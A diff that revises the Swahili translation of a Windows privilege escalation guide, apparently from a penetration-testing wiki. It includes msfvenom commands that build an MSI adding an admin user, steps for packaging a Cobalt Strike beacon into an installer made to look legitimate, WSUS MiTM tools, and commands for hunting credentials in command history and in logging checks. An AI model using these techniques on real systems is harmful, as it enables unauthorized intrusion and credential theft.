@@ -17,7 +17,7 @@ access-tokens.md ### ACLs - DACLs/SACLs/ACEs -**Angalia ukurasa ufuatao kwa maelezo zaidi kuhusu ACLs - DACLs/SACLs/ACEs:** +**Tazama ukurasa ufuatao kwa taarifa zaidi kuhusu ACLs - DACLs/SACLs/ACEs:** {{#ref}} @@ -26,27 +26,27 @@ acls-dacls-sacls-aces.md ### Integrity Levels -**Ikiwa hujui ni nini viwango vya uaminifu katika Windows unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:** +**Kama haufahamu integrity levels katika Windows, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:** {{#ref}} integrity-levels.md {{#endref}} -## Windows Security Controls +## Udhibiti wa Usalama wa Windows -Kuna mambo tofauti katika Windows ambayo yanaweza **kukuzuia kuhesabu mfumo**, kuendesha executable au hata **kubaini shughuli zako**. Unapaswa **kusoma** **ukurasa** ufuatao na **kuhesabu** mifumo hii yote ya **ulinzi** **kabla ya kuanza kuhesabu kupandisha mamlaka:** +Kuna mambo mbalimbali ndani ya Windows ambayo yanaweza **kukuzuia kuorodhesha mfumo**, kuendesha executables au hata **kubaini shughuli zako**. Unapaswa **kusoma** ukurasa ufuatao na **kuorodhesha** mifumo yote ya **mifumo** **ya ulinzi** kabla ya kuanza upembuzi wa privilege escalation: {{#ref}} ../authentication-credentials-uac-and-efs/ {{#endref}} -## System Info +## Taarifa za Mfumo -### Version info enumeration +### Orodhesha taarifa za toleo -Angalia ikiwa toleo la Windows lina udhaifu wowote unaojulikana (angalia pia patches zilizotumika). +Angalia kama toleo la Windows lina udhaifu unaojulikana (angalia pia patches zilizowekwa). ```bash systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information 
@@ -59,31 +59,31 @@ wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architec Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches Get-Hotfix -description "Security update" #List only "Security Update" patches ``` -### Version Exploits +### Exploits za Toleo -Hii [site](https://msrc.microsoft.com/update-guide/vulnerability) ni muhimu kwa kutafuta taarifa za kina kuhusu udhaifu wa usalama wa Microsoft. Hii database ina zaidi ya udhaifu wa usalama 4,700, ikionyesha **uso mkubwa wa shambulio** ambao mazingira ya Windows yanatoa. +Hii [site](https://msrc.microsoft.com/update-guide/vulnerability) ni muhimu kwa kutafuta taarifa za kina kuhusu udhaifu wa usalama wa Microsoft. Hifadhidata hii ina zaidi ya udhaifu 4,700 za usalama, ikionyesha **eneo kubwa la mashambulizi** ambalo mazingira ya Windows yanatoa. **Kwenye mfumo** - _post/windows/gather/enum_patches_ - _post/multi/recon/local_exploit_suggester_ - [_watson_](https://github.com/rasta-mouse/Watson) -- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas ina watson iliyojumuishwa)_ +- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas has watson embedded)_ -**Kitaifa na taarifa za mfumo** +**Kwenye kompyuta, kwa taarifa za mfumo** - [https://github.com/AonCyberLabs/Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - [https://github.com/bitsadmin/wesng](https://github.com/bitsadmin/wesng) -**Github repos za exploits:** +**GitHub repos za exploits:** - [https://github.com/nomi-sec/PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub) - [https://github.com/abatchy17/WindowsExploits](https://github.com/abatchy17/WindowsExploits) - [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) -### Environment +### Mazingira -Je, kuna taarifa yoyote ya akidi/Juicy iliyohifadhiwa 
katika mabadiliko ya mazingira? +Je, kuna credential/Juicy info iliyohifadhiwa katika env variables? ```bash set dir env: @@ -99,9 +99,9 @@ type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.tx cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` -### Fail za PowerShell Transcript +### Faili za PowerShell Transcript -Unaweza kujifunza jinsi ya kuwasha hii katika [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) +Unaweza kujifunza jinsi ya kuiwasha hapa: [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) ```bash #Check is enable in the registry reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription 
@@ -116,39 +116,39 @@ Stop-Transcript ``` ### PowerShell Module Logging -Maelezo ya utekelezaji wa PowerShell pipeline yanarekodiwa, yakijumuisha amri zilizotekelezwa, mwito wa amri, na sehemu za skripti. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya pato huenda yasikamatwe. +Maelezo ya utekelezaji wa PowerShell pipeline yarekodiwa, yakiwemo amri zilizotekelezwa, miito ya amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji na matokeo yake huenda yasirekodiwe. -Ili kuwezesha hili, fuata maelekezo katika sehemu ya "Transcript files" ya hati, ukichagua **"Module Logging"** badala ya **"Powershell Transcription"**. +Ili kuwezesha hili, fuata maagizo katika sehemu ya "Transcript files" ya nyaraka, ukichagua **"Module Logging"** badala ya **"Powershell Transcription"**. ```bash reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging ``` -Ili kuona matukio 15 ya mwisho kutoka kwa kumbukumbu za PowersShell unaweza kutekeleza: +Ili kuona matukio 15 ya mwisho kutoka kwenye PowersShell logs unaweza kutekeleza: ```bash Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView ``` ### PowerShell **Script Block Logging** -Rekodi kamili ya shughuli na maudhui yote ya utekelezaji wa skripti yanakamatwa, kuhakikisha kwamba kila block ya msimbo inarekodiwa inavyotekelezwa. Mchakato huu unahifadhi njia ya ukaguzi ya kina ya kila shughuli, ambayo ni ya thamani kwa uchunguzi na kuchambua tabia mbaya. Kwa kurekodi shughuli zote wakati wa utekelezaji, maarifa ya kina kuhusu mchakato yanatolewa. +Rekodi kamili ya shughuli pamoja na maudhui yote ya utekelezaji wa script inakusanywa, ikihakikisha kwamba kila block ya code inaandikwa wakati inavyotekelezwa. 
Mchakato huu unahifadhi audit trail ya kina ya kila shughuli, muhimu kwa forensics na kwa kuchambua malicious behavior. Kwa kuandika shughuli zote wakati wa utekelezaji, taarifa za kina kuhusu mchakato zinapatikana. ```bash reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging ``` -Kusanya matukio ya Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ +Matukio ya kumbukumbu za Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ Ili kuona matukio 20 ya mwisho unaweza kutumia: ```bash Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview ``` -### Mipangilio ya Mtandao +### Mipangilio ya Intaneti ```bash reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" ``` -### Drives +### Diski ```bash wmic logicaldisk get caption || fsutil fsinfo drives wmic logicaldisk get caption,description,providername 
@@ -156,9 +156,9 @@ Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ``` ## WSUS -Unaweza kuathiri mfumo ikiwa masasisho hayajatolewa kwa kutumia http**S** bali http. +Unaweza kudhoofisha mfumo ikiwa maboresho hayataombwi kwa kutumia http**S** bali http. -Unaanza kwa kuangalia ikiwa mtandao unatumia masasisho ya WSUS yasiyo ya SSL kwa kukimbia yafuatayo katika cmd: +Unaanza kwa kukagua kama mtandao unatumia WSUS update isiyo na SSL kwa kuendesha yafuatayo kwenye cmd: ``` reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer ``` @@ -166,7 +166,7 @@ Au yafuatayo katika PowerShell: ``` Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer" ``` -Ikiwa utapata jibu kama moja ya haya: +Ikiwa unapata jibu kama mojawapo ya haya: ```bash HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535 
@@ -182,9 +182,9 @@ PSProvider : Microsoft.PowerShell.Core\Registry ``` Na ikiwa `HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer` au `Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver"` ni sawa na `1`. -Basi, **inaweza kutumika vibaya.** Ikiwa rejista ya mwisho ni sawa na 0, basi, kiingilio cha WSUS kitaachwa. +Basi, **inaweza kutumika.** Ikiwa rejista ya mwisho ni `0`, basi kipengee cha WSUS kitabaki kutotiliwa maanani. -Ili kutumia udhaifu huu unaweza kutumia zana kama: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus)- Hizi ni silaha za MiTM zilizofanywa kuwa na nguvu za kuingiza 'sasisho' za 'bandia' katika trafiki ya WSUS isiyo na SSL. +Ili kuchochea udhaifu huu unaweza kutumia zana kama: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus) - Hizi ni MiTM weaponized exploits scripts za kuingiza 'fake' updates kwenye trafiki ya WSUS isiyo-SSL. Soma utafiti hapa: 
@@ -194,26 +194,26 @@ CTX_WSUSpect_White_Paper (1).pdf **WSUS CVE-2020-1013** -[**Soma ripoti kamili hapa**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\ -Kimsingi, hii ndiyo kasoro ambayo hitilafu hii inatumia: +[**Read the complete report here**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\ +Kwa ufupi, hili ndilo kosa ambalo mdudu huyu unalitumia: -> Ikiwa tuna uwezo wa kubadilisha proxy yetu ya mtumiaji wa ndani, na Windows Updates inatumia proxy iliyowekwa katika mipangilio ya Internet Explorer, basi tuna uwezo wa kuendesha [PyWSUS](https://github.com/GoSecure/pywsus) kwa ndani ili kukamata trafiki yetu wenyewe na kuendesha msimbo kama mtumiaji aliyeinuliwa kwenye mali yetu. +> Ikiwa tuna uwezo wa kubadilisha proxy ya mtumiaji wa ndani, na Windows Updates inatumia proxy iliyowekwa kwenye mipangilio ya Internet Explorer, basi tunaweza kuendesha [PyWSUS](https://github.com/GoSecure/pywsus) kwa ndani ili kukamata trafiki yetu na kuendesha code kama mtumiaji mwenye viwango vya juu kwenye kifaa chetu. > -> Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia mipangilio ya mtumiaji wa sasa, pia itatumia duka lake la vyeti. Ikiwa tutaunda cheti kilichojisaini wenyewe kwa jina la mwenyeji wa WSUS na kuongeza cheti hiki kwenye duka la vyeti la mtumiaji wa sasa, tutakuwa na uwezo wa kukamata trafiki ya WSUS ya HTTP na HTTPS. WSUS haitumii mitindo kama HSTS kutekeleza uthibitisho wa aina ya kuaminiwa kwa matumizi ya kwanza kwenye cheti. Ikiwa cheti kilichowasilishwa kinatambuliwa na mtumiaji na kina jina sahihi la mwenyeji, kitakubaliwa na huduma. +> Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia mipangilio ya mtumiaji wa sasa, itatumia pia certificate store yake. 
Ikiwa tutatengeneza self-signed certificate kwa hostname ya WSUS na kuingiza cheti hicho kwenye certificate store ya mtumiaji wa sasa, tutaweza kukamata trafiki ya WSUS ya HTTP na HTTPS. WSUS hainatumii mbinu kama HSTS kuanzisha aina ya validation ya trust-on-first-use kwa cheti. Ikiwa cheti kilichowasilishwa kinatambulika na mtumiaji na kina hostname sahihi, kitakubaliwa na huduma. -Unaweza kutumia udhaifu huu kwa kutumia zana [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (mara tu itakapokuwa huru). +Unaweza kuchochea udhaifu huu kwa kutumia chombo [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (mara itakaporuhusiwa). ## KrbRelayUp -Udhaifu wa **kuinua mamlaka ya ndani** upo katika mazingira ya **domeni** ya Windows chini ya hali maalum. Hali hizi ni pamoja na mazingira ambapo **saini ya LDAP haitekelezwi,** watumiaji wana haki za kujitengenezea zinazowawezesha kuunda **Resource-Based Constrained Delegation (RBCD),** na uwezo wa watumiaji kuunda kompyuta ndani ya domeni. Ni muhimu kutambua kuwa **masharti haya** yanatimizwa kwa kutumia **mipangilio ya kawaida**. +Kuna udhaifu wa **local privilege escalation** katika mazingira ya Windows **domain** chini ya masharti maalum. Masharti haya ni pamoja na mazingira ambapo **LDAP signing is not enforced**, watumiaji wana haki zao za kujipatia ambazo zinaowezesha kusanidi **Resource-Based Constrained Delegation (RBCD)**, na uwezo wa watumiaji kuunda kompyuta ndani ya domain. Ni muhimu kutambua kuwa **mahitaji** haya yanakidhiwa kwa kutumia **mipangilio chaguomsingi**. 
-Pata **udhaifu katika** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp) +Pata **exploit** katika [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp) -Kwa maelezo zaidi kuhusu mtiririko wa shambulio angalia [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/) +Kwa taarifa zaidi kuhusu mtiririko wa shambulio angalia [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/) ## AlwaysInstallElevated -**Ikiwa** hizi 2 za rejista zime **wezeshwa** (thamani ni **0x1**), basi watumiaji wa mamlaka yoyote wanaweza **kusanidi** (kutekeleza) `*.msi` faili kama NT AUTHORITY\\**SYSTEM**. +**Ikiwa** hizi rejista 2 zimewezeshwa (thamani ni **0x1**), basi watumiaji wa daraja lolote wanaweza **kusakinisha** (kuendesha) `*.msi` files kama NT AUTHORITY\\**SYSTEM**. ```bash reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 
@@ -223,19 +223,20 @@ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallEle msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted ``` -Ikiwa una kikao cha meterpreter unaweza kujiendesha mbinu hii kwa kutumia moduli **`exploit/windows/local/always_install_elevated`** +Iwapo una kikao cha meterpreter unaweza kuendesha kiotomatiki mbinu hii ukitumia module **`exploit/windows/local/always_install_elevated`** ### PowerUP -Tumia amri `Write-UserAddMSI` kutoka power-up kuunda ndani ya saraka ya sasa faili ya MSI ya Windows ili kupandisha haki. Skripti hii inaandika msanidi wa MSI aliyeandaliwa mapema ambao unahitaji kuongeza mtumiaji/kikundi (hivyo utahitaji ufikiaji wa GIU): +Tumia amri `Write-UserAddMSI` kutoka power-up kuunda ndani ya saraka ya sasa binary ya Windows MSI ili kuinua privileges. Skripti hii inaandika installer ya MSI iliyotengenezwa awali ambayo itauliza kuongeza user/group (hivyo utahitaji GIU access): ``` Write-UserAddMSI ``` -Just execute the created binary to escalate privileges. +Tekeleza tu binary iliyotengenezwa ili kupandisha ruhusa. ### MSI Wrapper -Soma hii tutorial ili kujifunza jinsi ya kuunda MSI wrapper ukitumia zana hizi. Kumbuka kwamba unaweza kufunga faili ya "**.bat**" ikiwa unataka **tu** **kutekeleza** **mistari ya amri**. +Soma mwongozo huu ili ujifunze jinsi ya kuunda MSI wrapper ukitumia zana hizi. Kumbuka kwamba unaweza kufunika faili "**.bat**" ikiwa unataka **tu** **kutekeleza** **mistari ya amri** + {{#ref}} msi-wrapper.md 
@@ -243,50 +244,52 @@ msi-wrapper.md ### Create MSI with WIX + {{#ref}} create-msi-with-wix.md {{#endref}} ### Create MSI with Visual Studio -- **Generate** with Cobalt Strike or Metasploit a **new Windows EXE TCP payload** in `C:\privesc\beacon.exe` -- Fungua **Visual Studio**, chagua **Create a new project** na andika "installer" kwenye kisanduku cha utafutaji. Chagua mradi wa **Setup Wizard** na bonyeza **Next**. +- **Tengeneza** kwa kutumia Cobalt Strike au Metasploit **new Windows EXE TCP payload** katika `C:\privesc\beacon.exe` +- Fungua **Visual Studio**, chagua **Create a new project** na andika "installer" katika kisanduku cha utafutaji. Chagua mradi wa **Setup Wizard** na bonyeza **Next**. - Toa mradi jina, kama **AlwaysPrivesc**, tumia **`C:\privesc`** kwa eneo, chagua **place solution and project in the same directory**, na bonyeza **Create**. -- Endelea kubonyeza **Next** hadi ufikie hatua ya 3 ya 4 (chagua faili za kujumuisha). Bonyeza **Add** na chagua payload ya Beacon uliyotengeneza. Kisha bonyeza **Finish**. -- Taja mradi wa **AlwaysPrivesc** katika **Solution Explorer** na katika **Properties**, badilisha **TargetPlatform** kutoka **x86** hadi **x64**. -- Kuna mali nyingine unaweza kubadilisha, kama **Author** na **Manufacturer** ambazo zinaweza kufanya programu iliyosakinishwa kuonekana kuwa halali zaidi. -- Bonyeza-kulia kwenye mradi na chagua **View > Custom Actions**. -- Bonyeza-kulia **Install** na chagua **Add Custom Action**. -- Bonyeza mara mbili kwenye **Application Folder**, chagua faili yako ya **beacon.exe** na bonyeza **OK**. Hii itahakikisha kwamba payload ya beacon inatekelezwa mara tu installer inapotekelezwa. +- Endelea kubofya **Next** hadi ufikie hatua ya 3 kati ya 4 (choose files to include). Bonyeza **Add** na chagua Beacon payload uliyotengeneza. Kisha bonyeza **Finish**. +- Chagua mradi **AlwaysPrivesc** katika **Solution Explorer** na ndani ya **Properties**, badilisha **TargetPlatform** kutoka **x86** hadi **x64**. 
+- Kuna mali nyingine za mradi unaweza kubadilisha, kama **Author** na **Manufacturer** ambazo zinaweza kufanya programu iliyosakinishwa ionekane halali zaidi. +- Bonyeza kulia mradi na chagua **View > Custom Actions**. +- Bonyeza kulia **Install** na chagua **Add Custom Action**. +- Bonyeza mara mbili **Application Folder**, chagua faili yako **beacon.exe** na bonyeza **OK**. Hii itahakikisha beacon payload inatekelezwa mara tu installer itakapotekelezwa. - Chini ya **Custom Action Properties**, badilisha **Run64Bit** kuwa **True**. -- Hatimaye, **build it**. -- Ikiwa onyo `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` linaonyeshwa, hakikisha umeweka jukwaa kuwa x64. +- Mwisho, **build it**. +- Ikiwa onyo `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` linaonyeshwa, hakikisha umeweka platform kuwa x64. ### MSI Installation -Ili kutekeleza **installation** ya faili ya mbaya `.msi` katika **background:** +Ili kutekeleza **installation** ya faili `.msi` ya hasidi kwa **background:** ``` msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi ``` -Ili kutumia udhaifu huu unaweza kutumia: _exploit/windows/local/always_install_elevated_ +Ili kutekeleza udhaifu huu unaweza kutumia: _exploit/windows/local/always_install_elevated_ -## Antivirus na Vifaa vya Kugundua +## Antivirus and Detectors -### Mipangilio ya Ukaguzi +### Audit Settings -Mipangilio hii inaamua nini kinachorekodiwa, hivyo unapaswa kulipa kipaumbele +Mipangilio hii inaamua nini kinachorekodiwa (**kurekodiwa**), hivyo unapaswa kulipa umakini ``` reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit ``` ### WEF -Windows Event Forwarding, ni muhimu kujua wapi kumbukumbu zinatumwa +Windows Event Forwarding, ni vizuri kujua logs zinapotumwa ```bash reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager ``` ### LAPS -**LAPS** imeundwa 
kwa ajili ya **usimamizi wa nywila za Msimamizi wa ndani**, kuhakikisha kwamba kila nywila ni **ya kipekee, iliyopangwa kwa nasibu, na inasasishwa mara kwa mara** kwenye kompyuta zilizounganishwa na eneo. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji ambao wamepewa ruhusa ya kutosha kupitia ACLs, kuwapa uwezo wa kuona nywila za msimamizi wa ndani ikiwa wameidhinishwa. +**LAPS** imetengenezwa kwa ajili ya **usimamizi wa nywila za Administrator wa ndani**, kuhakikisha kwamba kila nywila ni **ya kipekee, iliyotengenezwa kwa nasibu, na inasasishwa mara kwa mara** kwenye kompyuta zilizojiunga na domain. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji ambao wamepewa ruhusa za kutosha kupitia ACLs, kuwaruhusu kuona nywila za Administrator wa ndani ikiwa wameidhinishwa. + {{#ref}} ../active-directory-methodology/laps.md 
@@ -294,36 +297,36 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs ### WDigest -Ikiwa inafanya kazi, **nywila za maandiko wazi zinahifadhiwa katika LSASS** (Huduma ya Mfumo wa Mamlaka ya Usalama wa Ndani).\ -[**Maelezo zaidi kuhusu WDigest kwenye ukurasa huu**](../stealing-credentials/credentials-protections.md#wdigest). +Ikiwa inafanya kazi, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\ +[**Taarifa zaidi kuhusu WDigest kwenye ukurasa huu**](../stealing-credentials/credentials-protections.md#wdigest). ```bash reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential ``` ### LSA Protection -Kuanzia na **Windows 8.1**, Microsoft ilianzisha ulinzi ulioimarishwa kwa Mamlaka ya Usalama wa Mitaa (LSA) ili **kuzuia** juhudi za michakato isiyoaminika **kusoma kumbukumbu zake** au kuingiza msimbo, hivyo kuimarisha usalama wa mfumo.\ +Kuanzia **Windows 8.1**, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili **kuzuia** jaribio la michakato isiyothibitishwa **kusoma kumbukumbu yake** au kuingiza msimbo, ikiboresha usalama wa mfumo.\ [**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection). ```bash reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL ``` ### Credentials Guard -**Credential Guard** ilianzishwa katika **Windows 10**. Lengo lake ni kulinda akiba za taarifa za kuingia zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama vile mashambulizi ya pass-the-hash.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) +**Credential Guard** ilianzishwa katika **Windows 10**. 
Kusudi lake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama pass-the-hash attacks.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) ```bash reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags ``` -### Cached Credentials +### Cheti zilizohifadhiwa -**Akreditif za Kikoa** zinathibitishwa na **Mamlaka ya Usalama wa Mitaa** (LSA) na kutumiwa na vipengele vya mfumo wa uendeshaji. Wakati data za kuingia za mtumiaji zinathibitishwa na kifurushi cha usalama kilichosajiliwa, akreditif za kikoa kwa mtumiaji kawaida huanzishwa.\ -[**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials). +**Cheti za domain** zinathibitishwa na **Local Security Authority** (LSA) na zinatumiwa na vipengele vya mfumo wa uendeshaji. Wakati data ya kuingia ya mtumiaji inathibitishwa na pakiti ya usalama iliyosajiliwa, cheti za domain kwa mtumiaji kwa kawaida huundwa.\ +[**Taarifa zaidi kuhusu Cheti zilizohifadhiwa hapa**](../stealing-credentials/credentials-protections.md#cached-credentials). ```bash reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT ``` ## Watumiaji & Vikundi -### Kuorodhesha Watumiaji & Vikundi +### Orodhesha Watumiaji & Vikundi -Unapaswa kuangalia kama kuna vikundi ambavyo unavyohusishwa navyo vina ruhusa za kuvutia +Unapaswa kuangalia ikiwa kuna vikundi ambavyo wewe ni mwanachama vinavyokuwa na ruhusa za kuvutia ```bash # CMD net users %username% #Me 
@@ -338,31 +341,31 @@ Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name Get-LocalGroupMember Administrators | ft Name, PrincipalSource ``` -### Vikundi vya Privileged +### Vikundi vilivyo na mamlaka -Ikiwa wewe **ni mwanachama wa kundi lolote la privileged unaweza kuwa na uwezo wa kupandisha mamlaka**. Jifunze kuhusu vikundi vya privileged na jinsi ya kuvunja sheria zao ili kupandisha mamlaka hapa: +Ikiwa wewe **ni sehemu ya kundi lenye mamlaka, unaweza kuwa na uwezo wa escalate privileges**. Jifunze kuhusu vikundi vilivyo na mamlaka na jinsi ya kuvitumia vibaya ili escalate privileges hapa: {{#ref}} ../active-directory-methodology/privileged-groups-and-token-privileges.md {{#endref}} -### Manipulation ya Token +### Token manipulation -**Jifunze zaidi** kuhusu nini maana ya **token** katika ukurasa huu: [**Windows Tokens**](../authentication-credentials-uac-and-efs/index.html#access-tokens).\ -Angalia ukurasa ufuatao ili **ujifunze kuhusu token za kuvutia** na jinsi ya kuzitumia vibaya: +**Jifunze zaidi** kuhusu ni nini **token** kwenye ukurasa huu: [**Windows Tokens**](../authentication-credentials-uac-and-efs/index.html#access-tokens).\ +Angalia ukurasa ufuatao ili **ujifunze kuhusu token zinazovutia** na jinsi ya kuvitumia vibaya: {{#ref}} privilege-escalation-abusing-tokens.md {{#endref}} -### Watumiaji waliounganishwa / Sesheni +### Watumiaji walioingia / Vikao ```bash qwinsta klist sessions ``` -### Nyumba za nyaraka +### Folda za nyumbani ```bash dir C:\Users Get-ChildItem C:\Users 
@@ -371,16 +374,16 @@ Get-ChildItem C:\Users ```bash net accounts ``` -### Pata maudhui ya clipboard +### Pata yaliyomo kwenye clipboard ```bash powershell -command "Get-Clipboard" ``` -## Kuendesha Mchakato +## Michakato Zinazokimbia ### Ruhusa za Faili na Folda -Kwanza kabisa, orodhesha mchakato **angalia nywila ndani ya mstari wa amri wa mchakato**.\ -Angalia kama unaweza **kufuta baadhi ya binary inayokimbia** au ikiwa una ruhusa za kuandika kwenye folda ya binary ili kutumia [**shambulio la DLL Hijacking**](dll-hijacking/index.html): +Kwanza kabisa, unapoorodhesha michakato **angalia nywila ndani ya command line ya mchakato**.\ +Angalia ikiwa unaweza **overwrite some binary running** au ikiwa una write permissions za folda ya binary ili ku-exploit [**DLL Hijacking attacks**](dll-hijacking/index.html): ```bash Tasklist /SVC #List processes running and services tasklist /v /fi "username eq system" #Filter "system" processes @@ -391,9 +394,9 @@ Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "sv #Without usernames Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id ``` -Daima angalia kwa [**electron/cef/chromium debuggers** zinazotembea, unaweza kuzitumia kuboresha mamlaka](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md). +Daima angalia uwezekano wa [**electron/cef/chromium debuggers** zikiendeshwa, unaweza kuzitumia ku-escalate privileges](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md). -**Kuangalia ruhusa za binaries za michakato** +**Kuangalia ruhusa za binaries za processes** ```bash for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do ( 
